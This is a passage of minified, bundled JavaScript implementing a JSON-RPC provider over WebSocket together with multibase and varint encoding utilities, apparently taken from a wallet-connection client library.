    const protocol = $ceb127018999f416$var$getUrlProtocol(url);
    if (typeof protocol === "undefined") return false;
    return new RegExp(regex).test(protocol);
}
function $ceb127018999f416$export$206c3129b8bb1b4f(url) {
    return $ceb127018999f416$var$matchRegexProtocol(url, $ceb127018999f416$var$HTTP_REGEX);
}
function $ceb127018999f416$export$4e4463e75eccf20c(url) {
    return $ceb127018999f416$var$matchRegexProtocol(url, $ceb127018999f416$var$WS_REGEX);
}
function $ceb127018999f416$export$8eb4a0a481601f29(url) {
    return new RegExp("wss?://localhost(:d{2,5})?").test(url);
}


function $2e45abd1d679ec32$export$bf3617e9fafa893f(payload) {
    return typeof payload === "object" && "id" in payload && "jsonrpc" in payload && payload.jsonrpc === "2.0";
}
function $2e45abd1d679ec32$export$f6e4034abe07d2a5(payload) {
    return $2e45abd1d679ec32$export$bf3617e9fafa893f(payload) && "method" in payload;
}
function $2e45abd1d679ec32$export$308ba927de2bcbe8(payload) {
    return $2e45abd1d679ec32$export$bf3617e9fafa893f(payload) && ($2e45abd1d679ec32$export$cb3d3b20e3223d77(payload) || $2e45abd1d679ec32$export$5662a1047b4d1d15(payload));
}
function $2e45abd1d679ec32$export$cb3d3b20e3223d77(payload) {
    return "result" in payload;
}
function $2e45abd1d679ec32$export$5662a1047b4d1d15(payload) {
    return "error" in payload;
}
function $2e45abd1d679ec32$export$ae97720cc2d120d4(validation) {
    return "error" in validation && validation.valid === false;
}




class $1582203255a670cd$export$da28308012bf6748 extends (0, $4b3041b8db0f8b25$export$46957420a688a16d) {
    constructor(connection){
        super(connection);
        this.events = new (0, $7etJZ.EventEmitter)();
        this.hasRegisteredEventListeners = false;
        this.connection = this.setConnection(connection);
        if (this.connection.connected) this.registerEventListeners();
    }
    async connect(connection = this.connection) {
        await this.open(connection);
    }
    async disconnect() {
        await this.close();
    }
    on(event, listener) {
        this.events.on(event, listener);
    }
    once(event, listener) {
        this.events.once(event, listener);
    }
    off(event, listener) {
        this.events.off(event, listener);
    }
    removeListener(event, listener) {
        this.events.removeListener(event, listener);
    }
    async request(request, context) {
        return this.requestStrict((0, $3bb3ddc7bbc938cc$export$11d081ebb32d4398)(request.method, request.params || [], request.id || (0, $3bb3ddc7bbc938cc$export$799a3db5df197877)().toString()), context);
    }
    async requestStrict(request, context) {
        return new Promise(async (resolve, reject)=>{
            if (!this.connection.connected) try {
                await this.open();
            } catch (e) {
                reject(e);
            }
            this.events.on(`${request.id}`, (response)=>{
                if ((0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(response)) reject(response.error);
                else resolve(response.result);
            });
            try {
                await this.connection.send(request, context);
            } catch (e) {
                reject(e);
            }
        });
    }
    setConnection(connection = this.connection) {
        return connection;
    }
    onPayload(payload) {
        this.events.emit("payload", payload);
        if ((0, $2e45abd1d679ec32$export$308ba927de2bcbe8)(payload)) this.events.emit(`${payload.id}`, payload);
        else this.events.emit("message", {
            type: payload.method,
            data: payload.params
        });
    }
    onClose(event) {
        if (event && event.code === 3000) this.events.emit("error", new Error(`WebSocket connection closed abnormally with code: ${event.code} ${event.reason ? `(${event.reason})` : ""}`));
        this.events.emit("disconnect");
    }
    async open(connection = this.connection) {
        if (this.connection === connection && this.connection.connected) return;
        if (this.connection.connected) this.close();
        if (typeof connection === "string") {
            await this.connection.open(connection);
            connection = this.connection;
        }
        this.connection = this.setConnection(connection);
        await this.connection.open();
        this.registerEventListeners();
        this.events.emit("connect");
    }
    async close() {
        await this.connection.close();
    }
    registerEventListeners() {
        if (this.hasRegisteredEventListeners) return;
        this.connection.on("payload", (payload)=>this.onPayload(payload));
        this.connection.on("close", (event)=>this.onClose(event));
        this.connection.on("error", (error)=>this.events.emit("error", error));
        this.connection.on("register_error", (error)=>this.onClose());
        this.hasRegisteredEventListeners = true;
    }
}
var $1582203255a670cd$export$2e2bcd8739ae039 = $1582203255a670cd$export$da28308012bf6748;


var $566b2fdf5e300ab1$export$2e2bcd8739ae039 = (0, $1582203255a670cd$export$2e2bcd8739ae039);




var $7etJZ = parcelRequire("7etJZ");



const $d4cf0068a97a66e2$export$a82e41cf513c80da = ()=>{
    if (typeof WebSocket !== "undefined") return WebSocket;
    else if (typeof $parcel$global !== "undefined" && typeof $parcel$global.WebSocket !== "undefined") return $parcel$global.WebSocket;
    else if (typeof window !== "undefined" && typeof window.WebSocket !== "undefined") return window.WebSocket;
    else if (typeof self !== "undefined" && typeof self.WebSocket !== "undefined") return self.WebSocket;
    return (parcelRequire("jlahN"));
};
const $d4cf0068a97a66e2$export$6497c65e1ab5df4b = ()=>typeof WebSocket !== "undefined" || typeof $parcel$global !== "undefined" && typeof $parcel$global.WebSocket !== "undefined" || typeof window !== "undefined" && typeof window.WebSocket !== "undefined" || typeof self !== "undefined" && typeof self.WebSocket !== "undefined";
const $d4cf0068a97a66e2$export$4e09c449d6c407f7 = ()=>typeof window !== "undefined";
const $d4cf0068a97a66e2$export$d45d5c4a5bda9dc2 = (wssUrl)=>wssUrl.split("?")[0];


const $b32c19adc47af628$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT = 10;
const $b32c19adc47af628$var$WS = (0, $d4cf0068a97a66e2$export$a82e41cf513c80da)();
class $b32c19adc47af628$export$ea0df116fa892998 {
    constructor(url){
        this.url = url;
        this.events = new (0, $7etJZ.EventEmitter)();
        this.registering = false;
        if (!(0, $ceb127018999f416$export$4e4463e75eccf20c)(url)) throw new Error(`Provided URL is not compatible with WebSocket connection: ${url}`);
        this.url = url;
    }
    get connected() {
        return typeof this.socket !== "undefined";
    }
    get connecting() {
        return this.registering;
    }
    on(event, listener) {
        this.events.on(event, listener);
    }
    once(event, listener) {
        this.events.once(event, listener);
    }
    off(event, listener) {
        this.events.off(event, listener);
    }
    removeListener(event, listener) {
        this.events.removeListener(event, listener);
    }
    async open(url = this.url) {
        await this.register(url);
    }
    async close() {
        return new Promise((resolve, reject)=>{
            if (typeof this.socket === "undefined") {
                reject(new Error("Connection already closed"));
                return;
            }
            this.socket.onclose = (event)=>{
                this.onClose(event);
                resolve();
            };
            this.socket.close();
        });
    }
    async send(payload, context) {
        if (typeof this.socket === "undefined") this.socket = await this.register();
        try {
            this.socket.send((0, $81c2e06d24b89184$export$abc3f407e87918a4)(payload));
        } catch (e) {
            this.onError(payload.id, e);
        }
    }
    register(url = this.url) {
        if (!(0, $ceb127018999f416$export$4e4463e75eccf20c)(url)) throw new Error(`Provided URL is not compatible with WebSocket connection: ${url}`);
        if (this.registering) {
            const currentMaxListeners = this.events.getMaxListeners();
            if (this.events.listenerCount("register_error") >= currentMaxListeners || this.events.listenerCount("open") >= currentMaxListeners) this.events.setMaxListeners(currentMaxListeners + 1);
            return new Promise((resolve, reject)=>{
                this.events.once("register_error", (error)=>{
                    this.resetMaxListeners();
                    reject(error);
                });
                this.events.once("open", ()=>{
                    this.resetMaxListeners();
                    if (typeof this.socket === "undefined") return reject(new Error("WebSocket connection is missing or invalid"));
                    resolve(this.socket);
                });
            });
        }
        this.url = url;
        this.registering = true;
        return new Promise((resolve, reject)=>{
            const opts = !(0, $21f900087ef2a598$exports.isReactNative)() ? {
                rejectUnauthorized: !(0, $ceb127018999f416$export$8eb4a0a481601f29)(url)
            } : undefined;
            const socket = new $b32c19adc47af628$var$WS(url, [], opts);
            if ((0, $d4cf0068a97a66e2$export$6497c65e1ab5df4b)()) socket.onerror = (event)=>{
                const errorEvent = event;
                reject(this.emitError(errorEvent.error));
            };
            else socket.on("error", (errorEvent)=>{
                reject(this.emitError(errorEvent));
            });
            socket.onopen = ()=>{
                this.onOpen(socket);
                resolve(socket);
            };
        });
    }
    onOpen(socket) {
        socket.onmessage = (event)=>this.onPayload(event);
        socket.onclose = (event)=>this.onClose(event);
        this.socket = socket;
        this.registering = false;
        this.events.emit("open");
    }
    onClose(event) {
        this.socket = undefined;
        this.registering = false;
        this.events.emit("close", event);
    }
    onPayload(e) {
        if (typeof e.data === "undefined") return;
        const payload = typeof e.data === "string" ? (0, $81c2e06d24b89184$export$84137bb44359aed5)(e.data) : e.data;
        this.events.emit("payload", payload);
    }
    onError(id, e) {
        const error = this.parseError(e);
        const message = error.message || error.toString();
        const payload = (0, $3bb3ddc7bbc938cc$export$9f7302ae26c3f77)(id, message);
        this.events.emit("payload", payload);
    }
    parseError(e, url = this.url) {
        return (0, $ab82c37acb5ed82a$export$f555d7d8f922e407)(e, (0, $d4cf0068a97a66e2$export$d45d5c4a5bda9dc2)(url), "WS");
    }
    resetMaxListeners() {
        if (this.events.getMaxListeners() > $b32c19adc47af628$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT) this.events.setMaxListeners($b32c19adc47af628$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT);
    }
    emitError(errorEvent) {
        const error = this.parseError(new Error((errorEvent === null || errorEvent === void 0 ? void 0 : errorEvent.message) || `WebSocket connection failed for host: ${(0, $d4cf0068a97a66e2$export$d45d5c4a5bda9dc2)(this.url)}`));
        this.events.emit("register_error", error);
        return error;
    }
}
var $b32c19adc47af628$export$2e2bcd8739ae039 = $b32c19adc47af628$export$ea0df116fa892998;


var $5d413cc341fdd8f8$export$2e2bcd8739ae039 = (0, $b32c19adc47af628$export$2e2bcd8739ae039);



var $6cqMT = parcelRequire("6cqMT");
function $e9e439c110f17033$var$$i(r, e) {
    if (r.length >= 255) throw new TypeError("Alphabet too long");
    for(var t = new Uint8Array(256), i = 0; i < t.length; i++)t[i] = 255;
    for(var s = 0; s < r.length; s++){
        var n = r.charAt(s), a = n.charCodeAt(0);
        if (t[a] !== 255) throw new TypeError(n + " is ambiguous");
        t[a] = s;
    }
    var o = r.length, h = r.charAt(0), l = Math.log(o) / Math.log(256), d = Math.log(256) / Math.log(o);
    function b(u) {
        if (u instanceof Uint8Array || (ArrayBuffer.isView(u) ? u = new Uint8Array(u.buffer, u.byteOffset, u.byteLength) : Array.isArray(u) && (u = Uint8Array.from(u))), !(u instanceof Uint8Array)) throw new TypeError("Expected Uint8Array");
        if (u.length === 0) return "";
        for(var D = 0, A = 0, v = 0, R = u.length; v !== R && u[v] === 0;)v++, D++;
        for(var T = (R - v) * d + 1 >>> 0, m = new Uint8Array(T); v !== R;){
            for(var S = u[v], x = 0, I = T - 1; (S !== 0 || x < A) && I !== -1; I--, x++)S += 256 * m[I] >>> 0, m[I] = S % o >>> 0, S = S / o >>> 0;
            if (S !== 0) throw new Error("Non-zero carry");
            A = x, v++;
        }
        for(var P = T - A; P !== T && m[P] === 0;)P++;
        for(var B = h.repeat(D); P < T; ++P)B += r.charAt(m[P]);
        return B;
    }
    function y(u) {
        if (typeof u != "string") throw new TypeError("Expected String");
        if (u.length === 0) return new Uint8Array;
        var D = 0;
        if (u[D] !== " ") {
            for(var A = 0, v = 0; u[D] === h;)A++, D++;
            for(var R = (u.length - D) * l + 1 >>> 0, T = new Uint8Array(R); u[D];){
                var m = t[u.charCodeAt(D)];
                if (m === 255) return;
                for(var S = 0, x = R - 1; (m !== 0 || S < v) && x !== -1; x--, S++)m += o * T[x] >>> 0, T[x] = m % 256 >>> 0, m = m / 256 >>> 0;
                if (m !== 0) throw new Error("Non-zero carry");
                v = S, D++;
            }
            if (u[D] !== " ") {
                for(var I = R - v; I !== R && T[I] === 0;)I++;
                for(var P = new Uint8Array(A + (R - I)), B = A; I !== R;)P[B++] = T[I++];
                return P;
            }
        }
    }
    function k(u) {
        var D = y(u);
        if (D) return D;
        throw new Error(`Non-${e} character`);
    }
    return {
        encode: b,
        decodeUnsafe: y,
        decode: k
    };
}
var $e9e439c110f17033$var$Fi = $e9e439c110f17033$var$$i, $e9e439c110f17033$var$Mi = $e9e439c110f17033$var$Fi;
const $e9e439c110f17033$var$Oe = (r)=>{
    if (r instanceof Uint8Array && r.constructor.name === "Uint8Array") return r;
    if (r instanceof ArrayBuffer) return new Uint8Array(r);
    if (ArrayBuffer.isView(r)) return new Uint8Array(r.buffer, r.byteOffset, r.byteLength);
    throw new Error("Unknown type, must be binary type");
}, $e9e439c110f17033$var$Ki = (r)=>new TextEncoder().encode(r), $e9e439c110f17033$var$ki = (r)=>new TextDecoder().decode(r);
class $e9e439c110f17033$var$Bi {
    constructor(e, t, i){
        this.name = e, this.prefix = t, this.baseEncode = i;
    }
    encode(e) {
        if (e instanceof Uint8Array) return `${this.prefix}${this.baseEncode(e)}`;
        throw Error("Unknown type, must be binary type");
    }
}
class $e9e439c110f17033$var$ji {
    constructor(e, t, i){
        if (this.name = e, this.prefix = t, t.codePointAt(0) === void 0) throw new Error("Invalid prefix character");
        this.prefixCodePoint = t.codePointAt(0), this.baseDecode = i;
    }
    decode(e) {
        if (typeof e == "string") {
            if (e.codePointAt(0) !== this.prefixCodePoint) throw Error(`Unable to decode multibase string ${JSON.stringify(e)}, ${this.name} decoder only supports inputs prefixed with ${this.prefix}`);
            return this.baseDecode(e.slice(this.prefix.length));
        } else throw Error("Can only multibase decode strings");
    }
    or(e) {
        return $e9e439c110f17033$var$xe(this, e);
    }
}
class $e9e439c110f17033$var$Vi {
    constructor(e){
        this.decoders = e;
    }
    or(e) {
        return $e9e439c110f17033$var$xe(this, e);
    }
    decode(e) {
        const t = e[0], i = this.decoders[t];
        if (i) return i.decode(e);
        throw RangeError(`Unable to decode multibase string ${JSON.stringify(e)}, only inputs prefixed with ${Object.keys(this.decoders)} are supported`);
    }
}
const $e9e439c110f17033$var$xe = (r, e)=>new $e9e439c110f17033$var$Vi({
        ...r.decoders || {
            [r.prefix]: r
        },
        ...e.decoders || {
            [e.prefix]: e
        }
    });
class $e9e439c110f17033$var$qi {
    constructor(e, t, i, s){
        this.name = e, this.prefix = t, this.baseEncode = i, this.baseDecode = s, this.encoder = new $e9e439c110f17033$var$Bi(e, t, i), this.decoder = new $e9e439c110f17033$var$ji(e, t, s);
    }
    encode(e) {
        return this.encoder.encode(e);
    }
    decode(e) {
        return this.decoder.decode(e);
    }
}
const $e9e439c110f17033$var$H = ({ name: r, prefix: e, encode: t, decode: i })=>new $e9e439c110f17033$var$qi(r, e, t, i), $e9e439c110f17033$var$M = ({ prefix: r, name: e, alphabet: t })=>{
    const { encode: i, decode: s } = $e9e439c110f17033$var$Mi(t, e);
    return $e9e439c110f17033$var$H({
        prefix: r,
        name: e,
        encode: i,
        decode: (n)=>$e9e439c110f17033$var$Oe(s(n))
    });
}, $e9e439c110f17033$var$Yi = (r, e, t, i)=>{
    const s = {};
    for(let d = 0; d < e.length; ++d)s[e[d]] = d;
    let n = r.length;
    for(; r[n - 1] === "=";)--n;
    const a = new Uint8Array(n * t / 8 | 0);
    let o = 0, h = 0, l = 0;
    for(let d = 0; d < n; ++d){
        const b = s[r[d]];
        if (b === void 0) throw new SyntaxError(`Non-${i} character`);
        h = h << t | b, o += t, o >= 8 && (o -= 8, a[l++] = 255 & h >> o);
    }
    if (o >= t || 255 & h << 8 - o) throw new SyntaxError("Unexpected end of data");
    return a;
}, $e9e439c110f17033$var$Gi = (r, e, t)=>{
    const i = e[e.length - 1] === "=", s = (1 << t) - 1;
    let n = "", a = 0, o = 0;
    for(let h = 0; h < r.length; ++h)for(o = o << 8 | r[h], a += 8; a > t;)a -= t, n += e[s & o >> a];
    if (a && (n += e[s & o << t - a]), i) for(; n.length * t & 7;)n += "=";
    return n;
}, $e9e439c110f17033$var$p = ({ name: r, prefix: e, bitsPerChar: t, alphabet: i })=>$e9e439c110f17033$var$H({
        prefix: e,
        name: r,
        encode (s) {
            return $e9e439c110f17033$var$Gi(s, i, t);
        },
        decode (s) {
            return $e9e439c110f17033$var$Yi(s, i, t, r);
        }
    }), $e9e439c110f17033$var$Ji = $e9e439c110f17033$var$H({
    prefix: "\x00",
    name: "identity",
    encode: (r)=>$e9e439c110f17033$var$ki(r),
    decode: (r)=>$e9e439c110f17033$var$Ki(r)
});
var $e9e439c110f17033$var$Hi = Object.freeze({
    __proto__: null,
    identity: $e9e439c110f17033$var$Ji
});
const $e9e439c110f17033$var$Wi = $e9e439c110f17033$var$p({
    prefix: "0",
    name: "base2",
    alphabet: "01",
    bitsPerChar: 1
});
var $e9e439c110f17033$var$Xi = Object.freeze({
    __proto__: null,
    base2: $e9e439c110f17033$var$Wi
});
const $e9e439c110f17033$var$Zi = $e9e439c110f17033$var$p({
    prefix: "7",
    name: "base8",
    alphabet: "01234567",
    bitsPerChar: 3
});
var $e9e439c110f17033$var$Qi = Object.freeze({
    __proto__: null,
    base8: $e9e439c110f17033$var$Zi
});
const $e9e439c110f17033$var$es = $e9e439c110f17033$var$M({
    prefix: "9",
    name: "base10",
    alphabet: "0123456789"
});
var $e9e439c110f17033$var$ts = Object.freeze({
    __proto__: null,
    base10: $e9e439c110f17033$var$es
});
const $e9e439c110f17033$var$is = $e9e439c110f17033$var$p({
    prefix: "f",
    name: "base16",
    alphabet: "0123456789abcdef",
    bitsPerChar: 4
}), $e9e439c110f17033$var$ss = $e9e439c110f17033$var$p({
    prefix: "F",
    name: "base16upper",
    alphabet: "0123456789ABCDEF",
    bitsPerChar: 4
});
var $e9e439c110f17033$var$rs = Object.freeze({
    __proto__: null,
    base16: $e9e439c110f17033$var$is,
    base16upper: $e9e439c110f17033$var$ss
});
const $e9e439c110f17033$var$ns = $e9e439c110f17033$var$p({
    prefix: "b",
    name: "base32",
    alphabet: "abcdefghijklmnopqrstuvwxyz234567",
    bitsPerChar: 5
}), $e9e439c110f17033$var$as = $e9e439c110f17033$var$p({
    prefix: "B",
    name: "base32upper",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567",
    bitsPerChar: 5
}), $e9e439c110f17033$var$os = $e9e439c110f17033$var$p({
    prefix: "c",
    name: "base32pad",
    alphabet: "abcdefghijklmnopqrstuvwxyz234567=",
    bitsPerChar: 5
}), $e9e439c110f17033$var$hs = $e9e439c110f17033$var$p({
    prefix: "C",
    name: "base32padupper",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=",
    bitsPerChar: 5
}), $e9e439c110f17033$var$cs = $e9e439c110f17033$var$p({
    prefix: "v",
    name: "base32hex",
    alphabet: "0123456789abcdefghijklmnopqrstuv",
    bitsPerChar: 5
}), $e9e439c110f17033$var$us = $e9e439c110f17033$var$p({
    prefix: "V",
    name: "base32hexupper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUV",
    bitsPerChar: 5
}), $e9e439c110f17033$var$ls = $e9e439c110f17033$var$p({
    prefix: "t",
    name: "base32hexpad",
    alphabet: "0123456789abcdefghijklmnopqrstuv=",
    bitsPerChar: 5
}), $e9e439c110f17033$var$ds = $e9e439c110f17033$var$p({
    prefix: "T",
    name: "base32hexpadupper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUV=",
    bitsPerChar: 5
}), $e9e439c110f17033$var$gs = $e9e439c110f17033$var$p({
    prefix: "h",
    name: "base32z",
    alphabet: "ybndrfg8ejkmcpqxot1uwisza345h769",
    bitsPerChar: 5
});
var $e9e439c110f17033$var$ps = Object.freeze({
    __proto__: null,
    base32: $e9e439c110f17033$var$ns,
    base32upper: $e9e439c110f17033$var$as,
    base32pad: $e9e439c110f17033$var$os,
    base32padupper: $e9e439c110f17033$var$hs,
    base32hex: $e9e439c110f17033$var$cs,
    base32hexupper: $e9e439c110f17033$var$us,
    base32hexpad: $e9e439c110f17033$var$ls,
    base32hexpadupper: $e9e439c110f17033$var$ds,
    base32z: $e9e439c110f17033$var$gs
});
const $e9e439c110f17033$var$Ds = $e9e439c110f17033$var$M({
    prefix: "k",
    name: "base36",
    alphabet: "0123456789abcdefghijklmnopqrstuvwxyz"
}), $e9e439c110f17033$var$ys = $e9e439c110f17033$var$M({
    prefix: "K",
    name: "base36upper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
});
var $e9e439c110f17033$var$bs = Object.freeze({
    __proto__: null,
    base36: $e9e439c110f17033$var$Ds,
    base36upper: $e9e439c110f17033$var$ys
});
const $e9e439c110f17033$var$ms = $e9e439c110f17033$var$M({
    name: "base58btc",
    prefix: "z",
    alphabet: "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
}), $e9e439c110f17033$var$Es = $e9e439c110f17033$var$M({
    name: "base58flickr",
    prefix: "Z",
    alphabet: "123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ"
});
var $e9e439c110f17033$var$fs = Object.freeze({
    __proto__: null,
    base58btc: $e9e439c110f17033$var$ms,
    base58flickr: $e9e439c110f17033$var$Es
});
const $e9e439c110f17033$var$ws = $e9e439c110f17033$var$p({
    prefix: "m",
    name: "base64",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",
    bitsPerChar: 6
}), $e9e439c110f17033$var$vs = $e9e439c110f17033$var$p({
    prefix: "M",
    name: "base64pad",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    bitsPerChar: 6
}), $e9e439c110f17033$var$Is = $e9e439c110f17033$var$p({
    prefix: "u",
    name: "base64url",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_",
    bitsPerChar: 6
}), $e9e439c110f17033$var$Cs = $e9e439c110f17033$var$p({
    prefix: "U",
    name: "base64urlpad",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=",
    bitsPerChar: 6
});
var $e9e439c110f17033$var$_s = Object.freeze({
    __proto__: null,
    base64: $e9e439c110f17033$var$ws,
    base64pad: $e9e439c110f17033$var$vs,
    base64url: $e9e439c110f17033$var$Is,
    base64urlpad: $e9e439c110f17033$var$Cs
});
const $e9e439c110f17033$var$Ae = Array.from("\uD83D\uDE80\uD83E\uDE90☄\uD83D\uDEF0\uD83C\uDF0C\uD83C\uDF11\uD83C\uDF12\uD83C\uDF13\uD83C\uDF14\uD83C\uDF15\uD83C\uDF16\uD83C\uDF17\uD83C\uDF18\uD83C\uDF0D\uD83C\uDF0F\uD83C\uDF0E\uD83D\uDC09☀\uD83D\uDCBB\uD83D\uDDA5\uD83D\uDCBE\uD83D\uDCBF\uD83D\uDE02❤\uD83D\uDE0D\uD83E\uDD23\uD83D\uDE0A\uD83D\uDE4F\uD83D\uDC95\uD83D\uDE2D\uD83D\uDE18\uD83D\uDC4D\uD83D\uDE05\uD83D\uDC4F\uD83D\uDE01\uD83D\uDD25\uD83E\uDD70\uD83D\uDC94\uD83D\uDC96\uD83D\uDC99\uD83D\uDE22\uD83E\uDD14\uD83D\uDE06\uD83D\uDE44\uD83D\uDCAA\uD83D\uDE09☺\uD83D\uDC4C\uD83E\uDD17\uD83D\uDC9C\uD83D\uDE14\uD83D\uDE0E\uD83D\uDE07\uD83C\uDF39\uD83E\uDD26\uD83C\uDF89\uD83D\uDC9E✌✨\uD83E\uDD37\uD83D\uDE31\uD83D\uDE0C\uD83C\uDF38\uD83D\uDE4C\uD83D\uDE0B\uD83D\uDC97\uD83D\uDC9A\uD83D\uDE0F\uD83D\uDC9B\uD83D\uDE42\uD83D\uDC93\uD83E\uDD29\uD83D\uDE04\uD83D\uDE00\uD83D\uDDA4\uD83D\uDE03\uD83D\uDCAF\uD83D\uDE48\uD83D\uDC47\uD83C\uDFB6\uD83D\uDE12\uD83E\uDD2D❣\uD83D\uDE1C\uD83D\uDC8B\uD83D\uDC40\uD83D\uDE2A\uD83D\uDE11\uD83D\uDCA5\uD83D\uDE4B\uD83D\uDE1E\uD83D\uDE29\uD83D\uDE21\uD83E\uDD2A\uD83D\uDC4A\uD83E\uDD73\uD83D\uDE25\uD83E\uDD24\uD83D\uDC49\uD83D\uDC83\uD83D\uDE33✋\uD83D\uDE1A\uD83D\uDE1D\uD83D\uDE34\uD83C\uDF1F\uD83D\uDE2C\uD83D\uDE43\uD83C\uDF40\uD83C\uDF37\uD83D\uDE3B\uD83D\uDE13⭐✅\uD83E\uDD7A\uD83C\uDF08\uD83D\uDE08\uD83E\uDD18\uD83D\uDCA6✔\uD83D\uDE23\uD83C\uDFC3\uD83D\uDC90☹\uD83C\uDF8A\uD83D\uDC98\uD83D\uDE20☝\uD83D\uDE15\uD83C\uDF3A\uD83C\uDF82\uD83C\uDF3B\uD83D\uDE10\uD83D\uDD95\uD83D\uDC9D\uD83D\uDE4A\uD83D\uDE39\uD83D\uDDE3\uD83D\uDCAB\uD83D\uDC80\uD83D\uDC51\uD83C\uDFB5\uD83E\uDD1E\uD83D\uDE1B\uD83D\uDD34\uD83D\uDE24\uD83C\uDF3C\uD83D\uDE2B⚽\uD83E\uDD19☕\uD83C\uDFC6\uD83E\uDD2B\uD83D\uDC48\uD83D\uDE2E\uD83D\uDE46\uD83C\uDF7B\uD83C\uDF43\uD83D\uDC36\uD83D\uDC81\uD83D\uDE32\uD83C\uDF3F\uD83E\uDDE1\uD83C\uDF81⚡\uD83C\uDF1E\uD83C\uDF88❌✊\uD83D\uDC4B\uD83D\uDE30\uD83E\uDD28\uD83D\uDE36\uD83E\uDD1D\uD83D\uDEB6\uD83D\uDCB0\uD83C\uDF53\uD83D\uDCA2\uD83E\uDD1F\uD83D\uDE41\uD83D\uDEA8\uD83D\uDCA8\uD83E\uDD2C✈\uD83C\uDF80\uD83C\uDF7A\uD83E\uDD13\uD83D\uDE19\uD83D\uDC9F\uD83C\uDF31\uD83D\uDE16\uD83D\uDC76\uD83E\uDD74▶➡❓\uD83D\uDC8E\uD83D\uDCB8⬇\uD83D\uDE28\uD83C\uDF1A\uD83E\uDD8B\uD83D\uDE37\uD83D\uDD7A⚠\uD83D\uDE45\uD83D\uDE1F\uD83D\uDE35\uD83D\uDC4E\uD83E\uDD32\uD83E\uDD20\uD83E\uDD27\uD83D\uDCCC\uD83D\uDD35\uD83D\uDC85\uD83E\uDDD0\uD83D\uDC3E\uD83C\uDF52\uD83D\uDE17\uD83E\uDD11\uD83C\uDF0A\uD83E\uDD2F\uD83D\uDC37☎\uD83D\uDCA7\uD83D\uDE2F\uD83D\uDC86\uD83D\uDC46\uD83C\uDFA4\uD83D\uDE47\uD83C\uDF51❄\uD83C\uDF34\uD83D\uDCA3\uD83D\uDC38\uD83D\uDC8C\uD83D\uDCCD\uD83E\uDD40\uD83E\uDD22\uD83D\uDC45\uD83D\uDCA1\uD83D\uDCA9\uD83D\uDC50\uD83D\uDCF8\uD83D\uDC7B\uD83E\uDD10\uD83E\uDD2E\uD83C\uDFBC\uD83E\uDD75\uD83D\uDEA9\uD83C\uDF4E\uD83C\uDF4A\uD83D\uDC7C\uD83D\uDC8D\uD83D\uDCE3\uD83E\uDD42"), $e9e439c110f17033$var$Rs = $e9e439c110f17033$var$Ae.reduce((r, e, t)=>(r[t] = e, r), []), $e9e439c110f17033$var$Ts = $e9e439c110f17033$var$Ae.reduce((r, e, t)=>(r[e.codePointAt(0)] = t, r), []);
function $e9e439c110f17033$var$Ss(r) {
    return r.reduce((e, t)=>(e += $e9e439c110f17033$var$Rs[t], e), "");
}
function $e9e439c110f17033$var$Ps(r) {
    const e = [];
    for (const t of r){
        const i = $e9e439c110f17033$var$Ts[t.codePointAt(0)];
        if (i === void 0) throw new Error(`Non-base256emoji character: ${t}`);
        e.push(i);
    }
    return new Uint8Array(e);
}
const $e9e439c110f17033$var$Os = $e9e439c110f17033$var$H({
    prefix: "\uD83D\uDE80",
    name: "base256emoji",
    encode: $e9e439c110f17033$var$Ss,
    decode: $e9e439c110f17033$var$Ps
});
var $e9e439c110f17033$var$xs = Object.freeze({
    __proto__: null,
    base256emoji: $e9e439c110f17033$var$Os
}), $e9e439c110f17033$var$As = $e9e439c110f17033$var$Ne, $e9e439c110f17033$var$ze = 128, $e9e439c110f17033$var$zs = 127, $e9e439c110f17033$var$Ns = ~$e9e439c110f17033$var$zs, $e9e439c110f17033$var$Us = Math.pow(2, 31);
function $e9e439c110f17033$var$Ne(r, e, t) {
    e = e || [], t = t || 0;
    for(var i = t; r >= $e9e439c110f17033$var$Us;)e[t++] = r & 255 | $e9e439c110f17033$var$ze, r /= 128;
    for(; r & $e9e439c110f17033$var$Ns;)e[t++] = r & 255 | $e9e439c110f17033$var$ze, r >>>= 7;
    return e[t] = r | 0, $e9e439c110f17033$var$Ne.bytes = t - i + 1, e;
}
var $e9e439c110f17033$var$Ls = $e9e439c110f17033$var$ae, $e9e439c110f17033$var$$s = 128, $e9e439c110f17033$var$Ue = 127;
function $e9e439c110f17033$var$ae(r, i) {
    var t = 0, i = i || 0, s = 0, n = i, a, o = r.length;
    do {
        if (n >= o) throw $e9e439c110f17033$var$ae.bytes = 0, new RangeError("Could not decode varint");
        a = r[n++], t += s < 28 ? (a & $e9e439c110f17033$var$Ue) << s : (a & $e9e439c110f17033$var$Ue) * Math.pow(2, s), s += 7;
    }while (a >= $e9e439c110f17033$var$$s);
    return $e9e439c110f17033$var$ae.bytes = n - i, t;
}
var $e9e439c110f17033$var$Fs = Math.pow(2, 7), $e9e439c110f17033$var$Ms = Math.pow(2, 14), $e9e439c110f17033$var$Ks = Math.pow(2, 21), $e9e439c110f17033$var$ks = Math.pow(2, 28), $e9e439c110f17033$var$Bs = Math.pow(2, 35), $e9e439c110f17033$var$js = Math.pow(2, 42), $e9e439c110f17033$var$Vs = Math.pow(2, 49), $e9e439c110f17033$var$qs = Math.pow(2, 56), $e9e439c110f17033$var$Ys = Math.pow(2, 63), $e9e439c110f17033$var$Gs = function(r) {
